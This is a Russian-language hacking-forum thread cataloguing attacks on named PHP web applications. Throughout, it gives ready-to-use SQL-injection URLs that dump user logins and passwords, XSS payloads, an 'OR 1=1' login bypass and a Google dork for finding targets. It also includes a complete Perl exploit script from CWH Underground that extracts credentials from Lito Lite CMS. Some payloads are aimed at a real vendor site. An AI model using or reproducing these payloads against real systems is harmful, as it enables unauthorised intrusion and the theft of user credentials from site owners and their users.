Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

iPHPortal 1.37_02

Пасивная XSS

Код:

http://site/user/?back_url=/" [xss code]

http://site/user/?action=remind&back_url=/" [xss code]

Раскрытие путей

Код:

http://site/forums/?action=forum_add_message&forum_id[]=

http://site/include/func/db/common_db.inc.php?site=[]

http://site/include/func/db/split_sql_file.inc.php?site=[]

SQL-injection (нужны права админа)

Код:

http://site/admin/index.php?admin_url=rubric_edit.php?rubric_id=173+union+select+1,2,3,concat_ws(0x3a,user_login,user_password)+from+user+limit+0,1/*

Автор: iSee

PHPSlideshow
XSS:

Код:

http://site/slideshow/index.php?directory=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/slideshow/index.php?directory=%3Cscript%3Edocument.location%3D%27http://forum.antichat.rua%27%3C/script%3E

2 часа ночи,пока все:(

Уязвимости T-Xore [торрент портал]

Project : T-Xore (http://bit-torrent.net.ru/7-skript-torrent-indeksatora-giganova.org.html)
Found by: Dimi4
Date : 03.02.09
Auth bypass

login.php
Bug func:

PHP код:


		
			
if (isset($_POST['username'])&&isset($_POST['password'])){

    $result = mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."' and password = '".md5($_POST['password'])."' LIMIT 1") or die (mysql_error());

    if (mysql_num_rows($result) == 0){

        stheader('Login Failed');

        login_form($_POST['username'],'Username or password incorrect.');

        footer();

        exit();

    }

Username: name' OR 1=1/*
Password: anything

Sql-inj

usertorrent.php
Bug func:

PHP код:


		
			
$result2 = mysql_query("SELECT * FROM torrents LEFT JOIN categories ON torrents.subcat = categories.subid WHERE posted_by='".strtolower($_GET)."'") or die (mysql_error());

Код:

usertorrent.php?usuario=giga'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),0x71),0x71),14,15,16,17,18,19,20,21,22+from+users/*

Ех..дам там полной скулей.. ну нафиг

Автор: faza02
Сайт производителя: geeklog.net

GeekLog v1.3.7sr1

sql-inj:

Код:

/filemgmt/singlefile.php?lid=-133+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*

etc..

пассы хэшированы в md5.

таблицы юзеров: gl_user
колонки: username, passwd

Автор: [JavaScript]
Сайт производителя: geeklog.net
Респекты: faza02 за показание двига.
Версии выше GeekLog v1.3.7sr1

Passive XSS:

Код:

/filemgmt/singlefile.php?lid="><script>alert(/xss/)</script><!--

Профессиональная Open Source CMS
Сайт производителя: www.4site.ru
SQL injection в модуле portfolio:

Код:

http://4site.ru/portfolio/index.shtml?s=5&i=-26+union+select+1,2,3,version(),5,6,7,8,9--

Код:

http://4site.ru/portfolio/index.shtml?s=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--

SQL injection в модуле FAQ:

Код:

http://4site.ru/faq/index.shtml?th=-5+union+select+1,2,version(),4,5--

После нахождения мной этих уязвимостей я наткнулся на сайт с почти аналогичным обзором багов на этом ресурсе... линк
---------------------------------------------------
The End!

Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit

Код:

#!/usr/bin/perl -w

#===========================================================

# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit

#===========================================================

#

#  ,--^----------,--------,-----,-------^--,

#  | |||||||||   `--------'     |          O        .. CWH Underground Hacking Team ..

#  `+---------------------------^----------|

#    `\_,-------, _________________________|

#      / XXXXXX /`|     /

#     / XXXXXX /  `\   /

#    / XXXXXX /\______(

#   / XXXXXX /           

#  / XXXXXX /

# (________(             

#  `------'

#

#AUTHOR : CWH Underground

#DATE : 29 November 2008

#SITE : cwh.citec.us

#

#

#####################################################

#APPLICATION : Lito Lite CMS

#DOWNLOAD    : http://www.lovedesigner.net/files/download/lito_lite.zip

######################################################

#

#Note: magic_quotes_gpc = off

#

#######################################################################################

#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK

#Special Thx : asylu3, str0ke, citec.us, milw0rm.com

#######################################################################################





use LWP::UserAgent;

use HTTP::Request;



if ($#ARGV+1 != 2)

{

   print "\n==============================================\n";

   print "    Lito Lite Remote SQL Injection Exploit   \n";

   print "                                              \n";

   print "        Discovered By CWH Underground         \n";

   print "==============================================\n";

   print "                                              \n";

   print "  ,--^----------,--------,-----,-------^--,   \n";

   print "  | |||||||||   `--------'     |          O        \n";

   print "  `+---------------------------^----------|   \n";

   print "    `\_,-------, _________________________|   \n";

   print "      / XXXXXX /`|     /                      \n";

   print "     / XXXXXX /  `\   /                       \n";

   print "    / XXXXXX /\______(                        \n";

   print "   / XXXXXX /                                 \n";

   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";

   print " (________(                                   \n";

   print "  `------'                                    \n";

   print "                                              \n"; 

   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";

   print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";

   exit();

}



$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];

$number = $ARGV[1];



print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";

print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";

print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

print "\n[+]Dump Username and Password\n";



for ($start=0;$start<$number;$start++) {



$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";

$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";

$res = $xpl->request($req);

$info = $res->content;

$count=$start+1;



if ($info =~ /:::(.+):::/)

{

$dump=$1;

($username,$password)= split('::',$dump);

printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";

}

else { 

        print "\n[*]Exploit Done !!" or die "\n[*]Exploit Failed !!\n";

        exit;

}

}



# milw0rm.com [2008-11-29]

http://www.milw0rm.com/exploits/7294

Max Write System

Автор: mailbrush
Оффсайт: http://www.webwisesage.com/maxwrite/
Тип уязвимости: SQL Injection

Код:

http://www.site.com/maxwrite/diarypage.php?did=-1+{SQL Injection}

Google Dork:

Код:

allinurl: diarypage.php?did=

PS: В теме SQL Инъекции я уже выклал все, что нагуглил =)

Wallist v1.2 - скрипт фотогаллереи
Уязвимость нашел: Kraneg
SQL-Inj:
1. при просмотре галереи в файле files/view.inc отсутствует фильтрация или вообще что то похожее на защиту от скули =(
Уязвимый код:

PHP код:


		
			
if(isset($_GET['pc']))

{

$query_pc = @mysql_query("select * from ".$separator."pod_categories where id_podcat=".$_GET['pc'].";");

if($query_pc)

{

//если запрос выполнен успешно

//Ищем категорию по данной подкатегории

$query_c= @mysql_query("select * from ".$separator."categories where id_cat=".mysql_result($query_pc,0,'id_cat').";");



if(!$query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}

        }



        else {show_error("Извените запрос на подкатегорию не выполнен, возможные причины:<li>Данного подраздела не существует<li>Не доступна база данных");}



        }

else

{

$query_c= @mysql_query("select * from ".$separator."categories where id_cat=".$_GET['c'].";");

if(!$query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}

        }

[....]

$cat['name']=@mysql_result($query_c,0,'name');

[....]

$p_cat['name']=@mysql_result($query_pc,0,'name');

[....]

echo "

<table width='100%'>

<tr><td width='50%'></td><td align=right>Раздел: ".$cat['name']."</td></tr>";

if (isset($p_cat)){echo "

<tr><td width='50%'></td><td align=right>Подраздел: ".$p_cat['name']."</td></tr>";

}

echo "

</table>

";

Пример использования уязвимости:

Код:

http://localhost/wallist/?action=ShowGallery&pc=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--

2.Отсутствие фильтрации в файле vote.php
Уязвимый код:

PHP код:


		
			
$user=mysql_query("select ip from rating where id_im=".$_GET['id']." and ip='".$_SERVER['REMOTE_ADDR']."';");

$rows=mysql_num_rows($user);

if($rows>0)

{

 echo "<center><h3><font color=red>Вы уже участвовали в рейтинге по данной фотографии...";

}

Пример запроса:
Голосуем за какую ни будь фотографию и далее выполняем запрос

Код:

http://localhost/wallist/vote.php?action=vote&rating=12&id=[ID]+and+ASCII(lower(substring(version(),1,1)))=53--

где [ID] равен иду фотографии за которую голосовали, к примеру

Код:

http://localhost/wallist/vote.php??action=vote&rating=12&id=5+and+ASCII(lower(substring(version(),1,1)))=53--

Если версия 5(ASCII = 53) то скрипт выведет Вы уже участвовали в рейтинге по данной фотографии... если другая то Спасибо что проголосовали за данную фотографию! я привел версию для примера...
Там же к примеру никто не ограничивает нас в выставлении балов картинке, то есть максимальные 12 балов вовсе не максимальные =). К примеру выполним:

Код:

http://localhost/wallist/vote.php?action=vote&rating=4000000&id=4

и поставится картинке с идом 4 - 4000000 балов =))
3. Опять скуль =)
Уязвимость находится в файле view_large.inc приводить код не буду почти везде он однотипный.. =\
Пример использования:

Код:

http://localhost/wallist/?action=ShowGalleryFile&id=-4+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--

XSS:
1.Активная xss в коментариях, не фильтруется поле name(files/addcom.inc)...
Уязвимый код:

PHP код:


		
			
 if (!preg_match("/[0-9a-z_]+@[0-9a-z_^\.]+\.[a-z]{2,3}/i", $_GET['email']))

        {



          echo "<center><font color=red>Неверно введен е-mail. Введите e-mail

          в виде <i>".$email."</i><br><a href='?action=ShowGalleryFile&id=".$_SESSION['id_im']."&functions=AddCom' title='Вернуться к форме'>[Вернуться к форме]</a>";

          exit();

        }



$query_com=@mysql_query("insert into ".$separator."comment values('',".$_GET['id'].",'".$_GET['name']."','".$_GET['email']."','".htmlspecialchars($_GET['text'])."',NOW(),'');");

2.Пасивная в скрипте vote.php:
Уязвимый код:

Код HTML:

<b>Спасибо что проголосовали за данную фотографию!</b></font><font color='#0071FB' size=-1><br>

Данной фотографии вы поставили: ".$_GET['rating']."

пример:

Код:

http://localhost/wallist/vote.php?action=vote&rating=<script>alert()</script>&id=[ID]

где ID картинка за которую вы еще не голосовали...

Вобщем думаю это не все, просто это все, на что хватило меня =) стандартный префикс db_ таблица с пользователями user_name и user_password(в открытом виде) админа к сожалению там нет... он собственно в файле config.php =) так же скрипт за собой не то что не удаляет, даже не просит удалить папку install со всеми вытекающими... =\

Гостевая книга.
код: http://dump.ru/file/1946627

1. SQL inj
бажный код:

PHP код:


		
			
$result=mysql_query("SELECT id,msg,ans,author,topic,date,host,email FROM $tb WHERE ans=".$ref." ORDER BY id desc");

не фильтруются передаваемые даные.

exploit:

Код:

http://localhost/forum/forum.php?cmd=show&id=-6+union+select+group_concat(concat_ws(0x3a,id,msg,ans,author,topic,date,host,email,url))+from+forum--

татие скули почти во всех параметрах!

2. Активная XSS.

Ну здесь уязвимы все поля...
вл любом из них вводим

Код:

"><script>alert(0x646f63756d656e742e636f6f6b6965)</script>

и видим куки)

Сильно не пинайте, знаю, что гостевая - один сплошной баг, но всеже решил опубликовать...
------------------------------------------------------------
The End!